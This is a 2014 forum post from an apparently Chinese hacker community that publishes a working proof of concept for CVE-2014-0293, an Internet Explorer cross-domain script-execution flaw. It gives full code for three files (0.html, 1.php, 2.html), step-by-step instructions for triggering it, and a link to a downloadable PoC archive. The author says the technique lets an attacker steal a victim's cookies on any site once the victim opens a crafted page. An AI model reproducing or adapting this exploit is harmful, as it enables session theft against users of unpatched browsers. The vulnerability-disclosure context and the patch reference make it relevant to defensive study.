搜索
查看: 368|回复: 0

CVE-2014-0293

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-3-29 11:44:58 | 显示全部楼层 |阅读模式
相关补丁:http://technet.microsoft.com/en-us/security/bulletin/ms14-010
漏洞作者:Dieyu
技术细节:用showModalDialog来维持script的执行,跳转至目标站,通过特殊手段最终在目标站点执行Javascript.
影响范围:IE6-11
PS:这个应该算是神跨域了。换句话来说,只要受害者打开了你特定的网页,你就有可能偷走受害者在任何站点上的cookies。

相关代码:

0.html
  1. <script>
  2. function go()
  3. {
  4. i.execScript("showModalDialog('2.html',window).location='javascript:alert(document.domain)';");
  5. }
  6. </script>
  7. 0.html<br>
  8. <a href="#" onclick="go();">Go</a><br>
  9. <iframe id=i width=500 height=500 src="1.php"></iframe>
复制代码

1.php
  1. <?php
  2. sleep(5);
  3. header("Location: http://www.google.co.uk/robots.txt");
  4. ?>
复制代码

2.html
  1. 2.html
  2. <script>
  3. returnValue = menuArguments;
  4. setTimeout("window.close()",6000);
  5. </script>
复制代码

补充说明:打开0.html在5s内点击Go,然后会弹出来窗口,询问你是否关闭。如果无法关闭,手动关闭后 即可在目标域名下执行指定的javascript.

POC:http://dieyu.org/insider2.zip
SHA1: f50b5aebdc7cd0a62f1ed97d776fe4b7fa47260e
MD5: bfdaa2a329ea639a363a4ba8c294f706

过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表